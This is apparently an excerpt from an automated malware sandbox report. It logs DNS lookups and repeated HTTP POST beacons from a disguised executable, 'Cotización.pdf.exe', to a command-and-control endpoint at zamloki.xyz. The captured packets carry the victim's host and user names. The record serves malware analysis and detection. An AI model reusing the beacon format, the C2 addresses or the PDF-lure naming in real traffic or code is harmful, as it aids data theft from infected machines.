                                    Jul 21, 2021 17:03:01.626866102 CEST8.8.8.8192.168.2.30x7c77No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.148718119 CEST8.8.8.8192.168.2.30xcb7bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.148718119 CEST8.8.8.8192.168.2.30xcb7bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.748351097 CEST8.8.8.8192.168.2.30xa7abNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.748351097 CEST8.8.8.8192.168.2.30xa7abNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.287558079 CEST8.8.8.8192.168.2.30xd493No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.287558079 CEST8.8.8.8192.168.2.30xd493No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.935904980 CEST8.8.8.8192.168.2.30x7c6aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.935904980 CEST8.8.8.8192.168.2.30x7c6aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:04.481213093 CEST8.8.8.8192.168.2.30x9873No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:04.481213093 CEST8.8.8.8192.168.2.30x9873No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.015263081 CEST8.8.8.8192.168.2.30xcafeNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.015263081 CEST8.8.8.8192.168.2.30xcafeNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.538188934 CEST8.8.8.8192.168.2.30x5fd9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.538188934 CEST8.8.8.8192.168.2.30x5fd9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.184719086 CEST8.8.8.8192.168.2.30x957bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.184719086 CEST8.8.8.8192.168.2.30x957bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.752397060 CEST8.8.8.8192.168.2.30xfcc3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.752397060 CEST8.8.8.8192.168.2.30xfcc3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:07.238719940 CEST8.8.8.8192.168.2.30xb09fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:07.238719940 CEST8.8.8.8192.168.2.30xb09fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • zamloki.xyz

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349727172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:47.860769987 CEST1275OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 190
                                    Connection: close
                                    Jul 21, 2021 17:01:47.881434917 CEST1275OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz367706DESKTOP-716T771k08F9C4E9C79A3B52B3F7394305tmTK
                                    Jul 21, 2021 17:01:48.154939890 CEST1276INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HCu%2BWGot2zpuW5laOc7rLI1l39a6SyWqikMVOpRxztbOUiIp6KZym9YNZO2pIMknfIVVsEI5nQEXhP26PTd67znu106LUnLvFFIGSw28Cq2kLuLTIuTufHdPgO%2FCsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e7e3d562b65-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.349728172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:48.486706972 CEST1277OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 190
                                    Connection: close
                                    Jul 21, 2021 17:01:48.508766890 CEST1277OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz367706DESKTOP-716T771+08F9C4E9C79A3B52B3F739430jFqt5
                                    Jul 21, 2021 17:01:48.781194925 CEST1278INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CSn4M7fCN11JsIWqkm8nhunsG5RHhN6U%2F%2BAwfFBVksWYm8PWZNrgMdUI02k%2B6sqw2R7H9q7UTIH50n7CFVJaqG8hO%2BQB3APz%2FLctzm%2FK97r9Zws7T3zt5w8i4iZx5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e821c0d4e6d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    10192.168.2.349738104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:53.544702053 CEST1296OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:53.564991951 CEST1296OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:53.822968006 CEST1297INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V57jX5VYJaOcQlUluPRTvrIVMaVARwz69gauN6Up8Cw1AX%2B9cz4qTO%2BicNwUTKRPoHca%2BJXzp5ICdOn3jBhymYWkwbXODOqCK5L6J65fncgo3FujPBgG6olbKdCVCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ea1bd8b4e8c-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    100192.168.2.349839172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:45.875520945 CEST5667OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:45.898169994 CEST5667OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:46.144359112 CEST5668INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bubj8xEiXcnxl3cpddT5VkciEez%2B3h1KGHxOn3UTs6uUN4qTun2zAD93d1Ajob3gDAoDF4U5iDmvn6O575rvhI4hlx7OgvrWj3nj3xh7FFYi6scnuEC9RXn4sa0mUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fe8ca5b0625-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    101192.168.2.349840104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:47.515414000 CEST5669OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:47.535134077 CEST5669OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:47.794224024 CEST5670INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjGG3L6oWTdypWwVRuTK083M8kS4MRK3JtFFp%2BmPMbA3vURgL5xH7kQZqboykR9w6nnn7QSGgp%2F8aj4OTVwcT4jF0JneGNr66F7EO5jlyGuTZFc170LPBS3YmWGYeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ff30eb5177e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    102192.168.2.349841104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:48.052467108 CEST5671OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:48.070213079 CEST5671OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:48.326651096 CEST5672INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YwO2pxvbs7XqC9EMYg%2FcRXMGsgwCPXlm7FBSKYBv45YKCPRUk%2B%2FGRxEoE4v9m%2FqIeqqByynRd%2BjNCCNVYqYSf0zs82ujt54oKyAxrGCx80NXVQfa5k64qGSm%2Fr4c6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ff669f71f51-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    103192.168.2.349842172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:48.613532066 CEST5673OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:48.633460999 CEST5673OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:48.902359962 CEST5674INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zvzLg6%2FvEfO0o6SG1VAXb2PbZaDnUUqfOloDETVNU4wY8CYd9Uua593%2FblpgOfam6No00wAG8LDh%2B%2F1OL4fe9IixMzMu1kZqKFCSrnFk1TyzylodMRJqtr58iQ9lrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ff9ee642b35-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    104192.168.2.349843172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:49.200373888 CEST5675OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:49.218384981 CEST5675OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:49.520839930 CEST5676INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jzY4ER6KBkisyjAKM4XJfYID8xuW8mGpBVF%2FPyEo4Pk1h0XcUNWP5jQGdv18fTEgI%2F9CSlGhus%2BO3q9xxMgW9Lchr57sMY8zxRBJV1q3SSwOMFWU4mwypnZh6rT%2FbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ffd9fce4a67-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    105192.168.2.349844104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:49.807202101 CEST5677OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:49.827281952 CEST5677OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:50.081218958 CEST5678INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j70VkB91amGAdQZMQqxt9YAPQ00GJhCSpSzklbfUZ8Zjmo%2BxfkdQB94XTHO1SjjBERO6tnoK7SCXc4CaNZH1ADuPepN1Anv%2BRxLjGCd8xL%2F7lo3wxAKcBap9FZ6bsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550015dfd2fa5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    106192.168.2.349845172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:50.493602991 CEST5679OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:50.511837959 CEST5679OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:50.894577026 CEST5680INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OP2roXEsAcG5xcKkwQ1SL6zBnvudnKq6lR51mb7RlnjgoStQ4iTKpw0HQYhnFTySkwFVkW0B1iD8nNOQKwVj924DtkEXmndeOnz6Ry3PXSpyxHz1EEDsaRFxvKyEyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255005ac45175e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    107192.168.2.349846172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:51.150120974 CEST5681OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:51.170741081 CEST5681OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:51.427320004 CEST5682INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZzIUKUFgz2qKBpps12WYelHR4biEZkWth1pXfOImBQeFD6mexrl6gFZAI91EZ1eB85Fjd35Os8J71UbYdgvqiiWwqrM16%2BD3f8K3w1VPXT2geIaQqyIoCyYi%2BDwvVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255009ce364dd6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    108192.168.2.349847104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:51.615075111 CEST5683OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:51.632952929 CEST5683OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:51.885638952 CEST5684INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cdWjG3iID8YsFRM6AHYLhEWSMCyK9MunZZRosCwHUaaYAaO2gbnL3SVMzqCnBlD7vnX1RJFx48rxfqIVU9ZZwI32tNNK2tWn7YGmIuPYK91%2F2zpV0VOHYjRj%2B1Dnug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725500cae9d062d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    109192.168.2.349848172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:52.226164103 CEST5685OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
